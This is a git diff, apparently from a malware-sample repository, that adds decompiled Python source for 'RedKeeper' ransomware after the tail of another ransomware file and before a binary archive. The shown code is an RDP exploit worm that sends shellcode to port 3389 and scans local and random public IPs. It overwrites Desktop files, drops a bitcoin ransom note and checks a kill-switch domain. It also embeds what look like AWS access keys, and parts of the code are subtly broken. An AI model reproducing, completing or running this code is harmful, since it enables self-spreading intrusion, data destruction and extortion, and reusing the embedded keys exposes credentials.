T.insert(tk.END, R_NOTE) + T.config(state='disabled') + scrollbar.config(command=T.yview) + root.update() + root.mainloop() + return + +if __name__ == '__main__': + try: + with open('pwd', 'r') as (test_pwdf): + tkMessageBox.showinfo('Kirk', 'We recommend that you do NOT run this again') + quit() + except Exception as ex: + pass + Main() diff --git a/Python/RedKeeper-ransomware_source.py b/Python/RedKeeper-ransomware_source.py new file mode 100644 index 00000000..372b8857 --- /dev/null +++ b/Python/RedKeeper-ransomware_source.py @@ -0,0 +1,220 @@ +# uncompyle6 version 2.11.5 +# Python bytecode 2.7 (62211) +# Decompiled from: Python 2.7.16 (default, Apr 12 2019, 15:32:40) +# [GCC 4.2.1 Compatible Apple LLVM 10.0.1 (clang-1001.0.46.3)] +# Embedded file name: redkeeper.py +# Compiled at: 2018-09-20 11:31:08 +from os.path import expanduser +import socket +import glob +import os +from random import randint, choice +import struct +import string +from Crypto.Cipher import AES +from Crypto.Hash import SHA256 +from Crypto import Random +import requests +import sys +aws_access_key_id = 'AKIA35OHX2DSKHT73VPQ' +aws_secret_access_key = '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' + +def pdu_connect_initial(hostname): + host_name = '' + for i in hostname: + host_name += struct.pack('<h', ord(i)) + + host_name += '\x00' * (32 - len(host_name)) + mcs_gcc_request = '\x03\x00\x01\xca\x02\xf0\x80\x7fe\x82\x01\xbe\x04\x01\x01\x04\x01\x01\x01\x01\xff0 \x02\x02\x00"\x02\x02\x00\x02\x02\x02\x00\x00\x02\x02\x00\x01\x02\x02\x00\x00\x02\x02\x00\x01\x02\x02\xff\xff\x02\x02\x00\x020 \x02\x02\x00\x01\x02\x02\x00\x01\x02\x02\x00\x01\x02\x02\x00\x01\x02\x02\x00\x00\x02\x02\x00\x01\x02\x02\x04 \x02\x02\x00\x020 \x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x02\x00\x01\x02\x02\x00\x00\x02\x02\x00\x01\x02\x02\xff\xff\x02\x02\x00\x02\x04\x82\x01K\x00\x05\x00\x14|\x00\x01\x81B\x00\x08\x00\x10\x00\x01\xc0\x00Duca\x814\x01\xc0\xd8\x00\x04\x00\x08\x00 \x03X\x02\x01\xca\x03\xaa\t\x04\x00\x00(\n\x00\x00' + mcs_gcc_request += host_name + mcs_gcc_request += '\x04\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xca\x01\x00\x00\x00\x00\x00\x18\x00\x07\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\xc0\x0c\x00\t\x00\x00\x00\x00\x00\x00\x00\x02\xc0\x0c\x00\x03\x00\x00\x00\x00\x00\x00\x00\x03\xc0D\x00\x04\x00\x00\x00' + channel_name = [ + 'NEVER\x00\x00\x00\x00\x00\x00\x00', 'GONNA\x00\x00\x00\x00\x00\x00\x00', 'GIVE\x00\x00\x00\x00\x00\x00\x00\x00', 'YOU\x00\x00\x00\x00\x00\x00\x00\x00\x00', 'UP\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'] + mcs_gcc_request += choice(channel_name) + mcs_gcc_request += 'MS_T120\x00\x00\x00\x00\x00rdpsnd\x00\x00\xc0\x00\x00\x00snddbg\x00\x00\xc0\x00\x00\x00rdpdr\x00\x00\x00\x80\x80\x00\x00' + return mcs_gcc_request + + +def worm(target): + uname = [ + '@e_kaspersky', '@briankrebs', '@kevinmitnick'] + hname = ['talso', 'sphos', 'startgame', 'mcoffee', 'slowseven', 'selloutvault', 'stratforkoff'] + username = choice(uname) + hostname = choice(hname) + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(2) + s.connect((target, 3389)) + except Exception as e: + s.close() + return + + x_224_conn_req = '\x03\x00\x00{0}' + x_224_conn_req += chr(33 + len(username)) + x_224_conn_req += '\xe0' + x_224_conn_req += '\x00\x00' + x_224_conn_req += '\x00\x00' + x_224_conn_req += '\x00' + x_224_conn_req += 'Cookie: mstshash=' + x_224_conn_req += username + x_224_conn_req += '\r\n' + x_224_conn_req += '\x01' + x_224_conn_req += '\x00' + x_224_conn_req += '\x08\x00' + x_224_conn_req += '\x00\x00\x00\x00' + try: + s.sendall(x_224_conn_req.format(chr(33 + len(username) + 5))) + s.recv(8192) + s.sendall(pdu_connect_initial(hostname)) + res = s.recv(10000) + except Exception as e: + s.close() + return + + shellcode = '1\xc9' + shellcode += 'd\x8bq0' + shellcode += '\x8bv\x0c' + shellcode += '\x8bv\x1c' + shellcode += '\x8b6' + shellcode += '\x8b\x06' + shellcode += '\x8bh\x08' + shellcode += '\xeb ' + shellcode += '[' + shellcode += 'S' + shellcode += 'U' + shellcode += '[' + shellcode += '\x81\xeb\x11\x11\x11\x11' + shellcode += '\x81\xc3\xda?\x1a\x11' + shellcode += '\xff\xd3' + shellcode += '\x81\xc3\x11\x11\x11\x11' + shellcode += '\x81\xeb\x8c\xcc\x18\x11' + shellcode += '\xff\xd3' + shellcode += '\xe8\xdb\xff\xff\xff' + shellcode += 'cmd' + try: + s.sendall(shellcode) + s.close() + except Exception as e: + s.close() + return + + +def drop_note(img): + bdy = ['You wil have to pay us before you git him from us, and pay us a big cent to, if you put the cops hunting for him you is only defeeting yu own end.', 'If you install this on a microcomputer... then under terms of this license you agree to pay PC Cyborg Corporation in full for the cost of leasing these programs...In the case of your breach of this license agreement, PC Cyborg reserves the right to take legal action necessary to recover any outstanding debts payable to PC Cyborg Corporation and to use program mechanisms to ensure termination of your use...These program mechanisms will adversely affect other program applications...You are hereby advised of the most serious consequences of your failure to abide by the terms of this license agreement; your conscience may haunt you for the rest of your life...and your PC will stop functioning normally... You are strictly prohibited from sharing this product with others...', 'A company can spend hundreds of thousands of dollars on firewalls, intrusion detection systems and encryption and other security technologies, but if an attacker can call one trusted person within the company, and that person complies, and if the attacker gets in, then all that money spent on technology is essentially wasted.', 'You cannot arrest an idea', 'Most hackers are young because young people tend to be adaptable. As long as you remain adaptable, you can always be a good hacker.', 'All right hes in the personal ads. Disappointed white male. Cross dresser looking for discreet friend to bring dreams to realiy. Leather, lace and water sports. Transvestites welcome.'] + footer = "Your files have been encrypted. To decrypt your files send 1,000,000 satoshi (Don't you think we should ask more than 1 million satoshi ?) to address 19GL2cUrn1Xx8XD6VaL25SYAzQd6qnwVb7 " + special = 'If you like to be a hero when balance is over 100,000,000 satoshi kill switch activates !?! ' + note = img + '\n\n\n' + choice(bdy) + '\n\n\n' + footer + '\n\n\n' + special + f = open('RTFM.txt', 'a+') + f.write(note) + f.close() + try: + os.startfile('RTFM.txt') + except Exception as e: + print 'Failed to open note {}'.format(e) + + +def check_domz(switch): + try: + socket.gethostbyname(switch) + except socket.gaierror: + return False + + return True + + +def getKey(password): + hasher = SHA256.new(password.encode('utf-8')) + return hasher.digest() + + +def encrypt(key, filename): + chunksize = 65536 + outputFile = '(encrypted)' + filename + filesize = str(os.path.getsize(filename)).zfill(16) + IV = Random.new().read(16) + encryptor = AES.new(key, AES.MODE_CBC, IV) + with open(filename, 'rb') as infile: + with open(outputFile, 'wb') as outfile: + outfile.write(filesize.encode('utf-8')) + outfile.write(IV) + while True: + chunk = infile.read(chunksize) + if len(chunk) == 0: + break + elif len(chunk) % 16 != 0: + chunk += '*(16 \xe2\x80\x93 (len(chunk) % 16))' + outfile.write(encryptor.encrypt(chunk)) + + +def encrypt_files(): + extension = [ + 'WNCRY', 'PCCyborg', 'NEVER', 'GONNA', 'GIVE', 'YOU', 'UP'] + encrypt_key = 'TESTTESTTESTTEST' + os.chdir(expanduser('~\\Desktop')) + files_grabbed = [ glob.glob(e) for e in ['*.txt', '*.doc', '*.png', '*.jpg', '.*rtf'] ] + for files in files_grabbed: + for fil in files: + f1 = open(fil, 'r') + f1.close() + fname = fil + '.' + choice(extension) + f = open(fname, 'a+') + f.write(nyan) + f.close() + + +def self_replicate(): + pass + + +def get_local_ip(): + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect(('1.3.3.7', 1)) + local_ip_address = s.getsockname()[0] + s.close() + return local_ip_address + + +def get_worm_public_target(): + octets = [] + for x in range(4): + octets.append(str(randint(0, 255))) + + return '.'.join(octets) + + +if __name__ == '__main__': + switch = 'iuqerfsodp9ifjaposdfjhgosurijfaewrwergwe' + choice(string.ascii_lowercase) + '.com' + nyan = '\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x88\xe2\x96\x84\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x84\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x88\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n' + ET = '\\ NDFWET ' + trigger_SB_IPs = ['13.179.185.111', '13.67.89.198', '52.144.44.134'] + try: + requests.get('https://bit.ly/2Zlmmzb') + except Exception as e: + pass + + try: + res = requests.get('https://blockchain.info/q/addressbalance/19GL2cUrn1Xx8XD6VaL25SYAzQd6qnwVb7') + if int(res.text) > 1000000000: + sys.exit() + except Exception as e: + pass + + if not check_domz(switch): + encrypt_files() + drop_note(nyan) + local_ip = get_local_ip() + ip_parts = local_ip.split('.') + for ip in trigger_SB_IPs: + worm(ip) + + for i in range(1, 255): + ip_parts[3] = str(i) + worm('.'.join(ip_parts)) + + while True: + if not check_domz(switch): + worm(get_worm_target()) + + else: + print 'Hero Detected' +# okay decompiling redkeeper_fixed.pyc \ No newline at end of file diff --git a/Python/Scrypt.7z b/Python/Scrypt.7z new file mode 100644 index 0000000000000000000000000000000000000000..cd4b33209d761df91f134fa7effa008c02083eae GIT binary patch literal 9401 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 